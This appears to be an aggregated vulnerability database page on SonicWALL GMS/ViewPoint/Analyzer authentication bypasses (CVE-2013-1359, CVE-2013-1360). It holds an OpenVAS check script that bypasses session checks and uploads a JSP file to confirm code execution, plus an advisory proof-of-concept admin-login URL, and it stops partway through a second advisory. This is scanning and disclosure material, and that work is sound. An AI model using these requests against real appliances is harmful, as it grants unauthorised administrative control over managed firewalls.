SonicWALL GMS/Viewpoint/Analyzer authentication bypass

2013-01-21T00:00:00

Description

It's possible to access few directories without authentication

Affected Software

CPE Name	Name	Version
	sonicwall global management system	7.0

{"id": "SECURITYVULNS:VULN:12839", "bulletinFamily": "software", "title": "SonicWALL GMS/Viewpoint/Analyzer authentication bypass", "description": "It's possible to access few directories without authentication", "published": "2013-01-21T00:00:00", "modified": "2013-01-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12839", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:28968", "https://vulners.com/securityvulns/securityvulns:doc:28969"], "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "type": "securityvulns", "lastseen": "2021-06-08T19:13:06", "edition": 2, "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-1808", "CPAI-2014-1290"]}, {"type": "cve", "idList": ["CVE-2013-1359", "CVE-2013-1360"]}, {"type": "exploitdb", "idList": ["EDB-ID:24203"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DA2C6058EEC4E08CE4AAA2F7408B7EB3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103642"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119639", "PACKETSTORM:119808"]}, {"type": "saint", "idList": ["SAINT:1D818306CDCE9D06452355B580B07037", "SAINT:7A9FC357D019902C8221DA08FCAAE376", "SAINT:C7FDFE5DCFFF03B22ABA033E11C9F99B", "SAINT:F3B855C79359E1F0667451D37C614E49"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28968", "SECURITYVULNS:DOC:28969"]}]}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-1808", "CPAI-2014-1290"]}, {"type": "cve", "idList": ["CVE-2013-1359"]}, {"type": "exploitdb", "idList": ["EDB-ID:24203"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/SONICWALL_GMS_UPLOAD"]}, {"type": "saint", "idList": ["SAINT:7A9FC357D019902C8221DA08FCAAE376"]}]}, "exploitation": null, "vulnersScore": 4.2}, "affectedSoftware": [{"name": "sonicwall global management system", "operator": "eq", "version": "7.0"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1660013489}, "_internal": {"score_hash": "1edd9bc1a311727564e4d7a2ed0db61d"}}

{"openvas": [{"lastseen": "2020-05-08T11:04:16", "description": "Multiple SonicWALL products including Global Management System (GMS),\n ViewPoint, Universal Management Appliance (UMA), and Analyzer are\n prone to an authentication-bypass vulnerability.", "cvss3": {}, "published": "2013-01-18T00:00:00", "type": "openvas", "title": "Multiple SonicWALL Products Authentication Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1360", "CVE-2013-1359"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Multiple SonicWALL Products Authentication Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103642\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(57445);\n script_cve_id(\"CVE-2013-1359\", \"CVE-2013-1360\");\n script_version(\"2020-05-05T09:44:01+0000\");\n\n script_name(\"Multiple SonicWALL Products Authentication Bypass Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57445\");\n script_xref(name:\"URL\", value:\"http://www.sonicwall.com/\");\n script_xref(name:\"URL\", value:\"http://sotiriu.de/adv/NSOADV-2013-001.txt\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-18 13:01:11 +0100 (Fri, 18 Jan 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"Multiple SonicWALL products including Global Management System (GMS),\n ViewPoint, Universal Management Appliance (UMA), and Analyzer are\n prone to an authentication-bypass vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to gain administrative access to the\n web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully\n compromise the system.\");\n\n script_tag(name:\"affected\", value:\"GMS/Analyzer/UMA 7.0.x\n\n GMS/ViewPoint/UMA 6.0.x\n\n GMS/ViewPoint/UMA 5.1.x\n\n GMS/ViewPoint 5.0.x\n\n GMS/ViewPoint 4.1.x\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:80);\n\nurl = \"/\";\nbuf = http_get_cache(item:url, port:port);\n\nif(! buf || \"<title>sonicwall\" >!< tolower(buf))\n exit(0);\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: 90\\r\\n\",\n\"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n\"\\r\\n\",\n\"num=123456&action=show_diagnostics&task=search&item=application_log&criteria=*.*&width=500\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(\"<OPTION VALUE\" >!< result)\n exit(0);\n\nlines = split(result);\n\nforeach line (lines) {\n if(\"<OPTION VALUE\" >< line) {\n a = split(line,sep:'\"', keep:FALSE);\n if(\"logs\" >< a[1]) {\n b = split(a[1],sep:\"logs\",keep:FALSE);\n gms_path = b[0];\n if(!isnull(gms_path))break;\n }\n }\n}\n\nif(isnull(gms_path))\n exit(0);\n\nif(gms_path =~ \"^/\") {\n gms_path = gms_path + \"webapps/appliance/\";\n} else {\n gms_path = gms_path + 'webapps\\\\appliance\\\\';\n}\n\nvtstrings = get_vt_strings();\nfile = vtstrings[\"lowercase_rand\"] + '.jsp';\njsp_print = vtstrings[\"lowercase_rand\"];\njsp = '<% out.println( \"' + jsp_print + '\" ); %>';\n\nlen = 325 + strlen(jsp) + strlen(gms_path) + strlen(file);\n\nreq = string(\n\"POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\\r\\n\",\n\"TE: deflate,gzip;q=0.3\\r\\n\",\n\"Connection: TE, close\\r\\n\",\n\"Host: \",host,\"\\r\\n\",\n\"User-Agent: \", useragent, \"\\r\\n\",\n\"Content-Length: \",len,\"\\r\\n\",\n\"Content-Type: multipart/form-data; boundary=xYzZY\\r\\n\",\n\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"action\"',\"\\r\\n\",\n\"\\r\\n\",\n\"file_system\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"task\"',\"\\r\\n\",\n\"\\r\\n\",\n\"uploadFile\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"searchFolder\"',\"\\r\\n\",\n\"\\r\\n\",\ngms_path,\"\\r\\n\",\n\"--xYzZY\\r\\n\",\n'Content-Disposition: form-data; name=\"uploadFileName\"; filename=\"',file,'\"',\"\\r\\n\",\n\"Content-Type: text/plain\\r\\n\",\n\"\\r\\n\",\njsp,\"\\r\\n\",\n\n\"\\r\\n\",\n\"--xYzZY--\\r\\n\");\n\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(!result || result !~ \"^HTTP/1\\.[01] 200\")\n exit(0);\n\nurl = '/appliance/' + file;\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(jsp_print >< buf) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSonicWALL GMSViewpointAnalyzer - Authentication Bypass", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-01-18T00:00:00", "title": "SonicWALL GMSViewpointAnalyzer - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "EXPLOITPACK:DA2C6058EEC4E08CE4AAA2F7408B7EB3", "href": "", "sourceData": "-------------------------- NSOADV-2013-002 ---------------------------\n\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\n______________________________________________________________________\n______________________________________________________________________\n\n 111101111\n 11111 00110 00110001111\n 111111 01 01 1 11111011111111\n 11111 0 11 01 0 11 1 1 111011001\n 11111111101 1 11 0110111 1 1111101111\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\n 01110 0 10 111110 110 0 11101111111111111111101111101\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\n 111 10 110 101011110010 11111111111111111111111 11 0011100\n 11 10 001100 0001 111111111111111111 10 11 11110\n 11110 00100 00001 10 1 1111 101010001 11111111\n 11101 0 1011 10000 00100 11100 00001101 0\n 0110 111011011 0110 10001 101 11110\n 1011 1 10 101 000001 01 00\n 1010 1 11001 1 1 101 10\n 110101011 0 101 11110\n 110000011\n 111\n______________________________________________________________________\n______________________________________________________________________\n\n Title: SonicWALL GMS/Viewpoint/Analyzer\n Authentication Bypass (/sgms/)\n Severity: Critical\n CVE-ID: CVE-2013-1360\n CVSS Base Score: 9\n Impact: 8.5\n Exploitability: 10\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\n Advisory ID: NSOADV-2013-002\n Found Date: 2012-04-26\n Date Reported: 2012-12-13\n Release Date: 2013-01-17\n Author: Nikolas Sotiriu\n Website: http://sotiriu.de\n Twitter: http://twitter.com/nsoresearch\n Mail: nso-research at sotiriu.de\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\n Affected Products: GMS\n Analyzer\n UMA\n ViewPoint\n Affected Platforms: Windows/Linux\n Affected Versions: GMS/Analyzer/UMA 7.0.x\n GMS/ViewPoint/UMA 6.0.x\n GMS/ViewPoint/UMA 5.1.x\n GMS/ViewPoint 5.0.x\n GMS/ViewPoint 4.1.x\n Remote Exploitable: Yes\n Local Exploitable: No\n Patch Status: Vendor released a patch (See Solution)\n Discovered by: Nikolas Sotiriu\n\n\n\nBackground:\n===========\n\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\ndistributed enterprises and service providers with a powerful and\nintuitive solution to centrally manage and rapidly deploy SonicWALL\nfirewall, anti-spam, backup and recovery, and secure remote access\nsolutions. Flexibly deployed as software, hardware, or a virtual\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\ncomprehensive policy and compliance reporting. For enterprise customers,\nSonicWALL GMS streamlines security policy management and appliance\ndeployment, minimizing administration overhead. Service Providers can\nuse GMS to simplify the security management of multiple clients and\ncreate additional revenue opportunities. For added redundancy and\nscalability, GMS can be deployed in a cluster configuration.\n\n(Product description from Website)\n\n\n\nDescription:\n============\n\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\nallows an unauthenticated, remote attacker to bypass the Web interface\nauthentication offered by the affected product.\n\nThe vulnerability is attributed to a broken session handling in the\nprocess of password change process of the web application.\nchanging in the web application.\n\nAn attacker may exploit this vulnerability by sending a specially\ncrafted request to the SGMS Interface (/sgms/).\n\nThe attacker gains full administrative access to the interface and\nfull control over all managed appliances, which could lead to a full\ncompromisation of the organisation.\n\n\n\nProof of Concept :\n==================\n\nAccess the following URL to login to the sgms interface:\n\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\n00000000001\n\nIf the Console is not directly shown, type any password you\nwant in the change password dialog twice and hit submit to login.\n\nMaybe you need to access the following URL after this process:\n\nhttp://host/sgms/auth\n\n\n\nSolution:\n=========\n\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\n\n\n\nDisclosure Timeline:\n====================\n\n2012-04-26: Vulnerability found\n2012-12-12: Sent the notification and disclosure policy and asked\n for a PGP Key (security@sonicwall.com)\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\n date (2012-12-28) to vendor\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\n release to the 3. calendar week 2013.\n2012-12-18: Changed release date to 2013-01-17.\n2012-12-20: Patch is published\n2013-01-17: Release of this advisory", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:13:07", "description": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T16:15:00", "type": "cve", "title": "CVE-2013-1360", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1360"], "modified": "2020-02-13T14:12:00", "cpe": ["cpe:/a:sonicwall:universal_management_appliance:5.1", "cpe:/a:sonicwall:universal_management_appliance:6.0", "cpe:/a:sonicwall:global_management_system:4.1", "cpe:/a:sonicwall:universal_management_appliance:7.0", "cpe:/a:sonicwall:viewpoint:6.0", "cpe:/a:sonicwall:global_management_system:6.0", "cpe:/a:sonicwall:global_management_system:7.0", "cpe:/a:sonicwall:viewpoint:4.1", "cpe:/a:sonicwall:viewpoint:5.0", "cpe:/a:sonicwall:global_management_system:5.0", "cpe:/a:sonicwall:analyzer:7.0", "cpe:/a:sonicwall:global_management_system:5.1"], "id": "CVE-2013-1360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1360", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:06", "description": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T17:15:00", "type": "cve", "title": "CVE-2013-1359", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2020-02-14T18:13:00", "cpe": ["cpe:/a:sonicwall:universal_management_appliance:5.1", "cpe:/a:sonicwall:universal_management_appliance:6.0", "cpe:/a:sonicwall:global_management_system:4.1", "cpe:/a:sonicwall:universal_management_appliance:7.0", "cpe:/a:sonicwall:viewpoint:6.0", "cpe:/a:sonicwall:global_management_system:6.0", "cpe:/a:sonicwall:global_management_system:7.0", "cpe:/a:sonicwall:viewpoint:4.1", "cpe:/a:sonicwall:viewpoint:5.0", "cpe:/a:sonicwall:global_management_system:5.0", "cpe:/a:sonicwall:analyzer:7.0", "cpe:/a:sonicwall:global_management_system:5.1"], "id": "CVE-2013-1359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2013-1360"], "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a broken session handling in the\r\nprocess of password change process of the web application.\r\nchanging in the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromisation of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to login to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to login.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory\r\n\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:DOC:28969", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28969", "title": "NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n______________________________________________________________________\r\n-------------------------- NSOADV-2013-001 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 